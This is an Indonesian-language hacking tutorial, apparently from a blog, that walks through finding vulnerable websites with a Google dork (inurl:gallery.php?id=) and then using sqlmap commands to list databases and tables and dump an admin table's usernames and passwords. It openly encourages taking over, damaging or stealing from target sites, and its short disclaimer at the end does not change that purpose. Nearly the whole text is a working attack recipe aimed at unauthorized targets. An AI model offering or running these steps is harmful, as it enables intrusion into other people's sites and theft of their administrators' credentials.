![Cara Hack Website Menggunakan SQL Map Sasasa10](https://i.servimg.com/u/f39/18/79/15/92/sasasa10.jpg)
Dengan mengetahui password maupun username dari sebuah website, kita tentunya akan dengan leluasanya mengendalikan website target tersebut.. kita dapat mengambil, menyebarkan, merusak, maupun mengambil alih kendali.
OS yang banyak digunakan para cyber, maupun hacker untuk membobol biasanya banyak menggunakan BackTrack, Kali Linux, dan lain-lain. yukk langsung ke TKP...
Langkah-langkah hack Website Menggunakan SQL Map dengan BackTracx 5 r3:
1. Cari Target Dengan Menggunakan Google Dork
untuk melihat lengkap kami sudah menyediakannya untuk pencarian menggunakan google dork, copy'kan code seperti
- Code:
inurl:gallery.php?id=
Silahkan lihat cara-caranya disini:
- <a href="http://pastebin.com/SRbDdwQn" target="blank"><button>Google Dork</button></a>
- <a href="http://pastebin.com/wcVkQhKe" target="blank"><button>Backup Google Dork</button></a>
2. Cari Website yang Vuvln, karena tidak semua website itu vuvln. dalam hal ini, biasanya kita menggunakan cara untuk melihat ID dengan menggunakan google dork yang sudah dicari tadi, contohnya seperti ini:
- Code:
inurl:gallery.php?id=
- Code:
http://www.nama_web.org/gallery.php?id=1"
![Cara Hack Website Menggunakan SQL Map Sss10](https://i.servimg.com/u/f39/18/79/15/92/sss10.jpg)
Jika terdapat error kurang lebih seperti gambar diatas, maka kemungkinan website tersebut vuvln.
3. Buka Console [ Terminal ]
Kemudian Ketikkan:
- Code:
cd /pentest/database/sqlmap [ Enter ]
- Code:
./sqlmap.py -u http://nama_website.org/gallery.php?id=1 --dbs
Contohnya Seperti gambar dibawah ini:
![Cara Hack Website Menggunakan SQL Map Sss110](https://i.servimg.com/u/f39/18/79/15/92/sss110.png)
4. Mecari table database'nya dengan perintah --tables atau --table
Gambar dibawah terdapat 2 nama database'nya, yaitu information_schema dan nubriorg_db.
Kemudian terserah kita mau melihat bagian yang mana, namun contoh dibawah kami membuka nama database yang bernama nubriorg_db.
Dengan mengedit bagian akhirnya menjadi seperti ini:
- Code:
./sqlmap.py -u http://nama_website.net/gallery.php?id=1 -D nubriorg_db --table
![Cara Hack Website Menggunakan SQL Map Sss210](https://i.servimg.com/u/f39/18/79/15/92/sss210.jpg)
5. Mencari Kolom username dan password target.
Setelah kita mendapatkan nama dari database tadi. Kemudian kita pecah lagi pada bagian admin [ bagian vital'nya ] Dengan mengetikkan:
- Code:
./sqlmap.py -u http://nama_website.net/gallery.php?id=1 -D nubriorg_db -T admin --columns
![Cara Hack Website Menggunakan SQL Map 10309810](https://i.servimg.com/u/f39/18/79/15/92/10309810.jpg)
6. Melihat nama dan password admin.
Setelah proses diatas dilalui, maka kita akan mendapatkan hasil seperti gambar dibawah ini. Kemudian kita lihat nama dan password dari admin tersebut dengan mengetikkan:
- Code:
./sqlmap.py -u http://nama_website.net/gallery.php?id=1 -D nubriorg_db -T admin --dump
![Cara Hack Website Menggunakan SQL Map 10319910](https://i.servimg.com/u/f39/18/79/15/92/10319910.jpg)
7. Waktunya Eksekusi.
Jika ada perintah untuk memilih Yes or No, Kita pilih: Y ,Seperti contoh dibawah ini. dan kemudian kita tunggu sampai proses'nya selesai.
![Cara Hack Website Menggunakan SQL Map 10320110](https://i.servimg.com/u/f39/18/79/15/92/10320110.jpg)
8. Duarrrrr!!
Selesai sudah...dan kita dapat bebas mau diapain itu website.
![Cara Hack Website Menggunakan SQL Map 10319810](https://i.servimg.com/u/f39/18/79/15/92/10319810.jpg)
Ane gak bertanggung jawab atas apa yang ente lakukan. Resiko ditanggung penumpang. Ane hanya sekedar sharing ilmu mengenai hal ini. Harap gunakan ilmu ini dengan sebijak-bijak'nya. |
Source: semua-tinggal-download.blogspot.com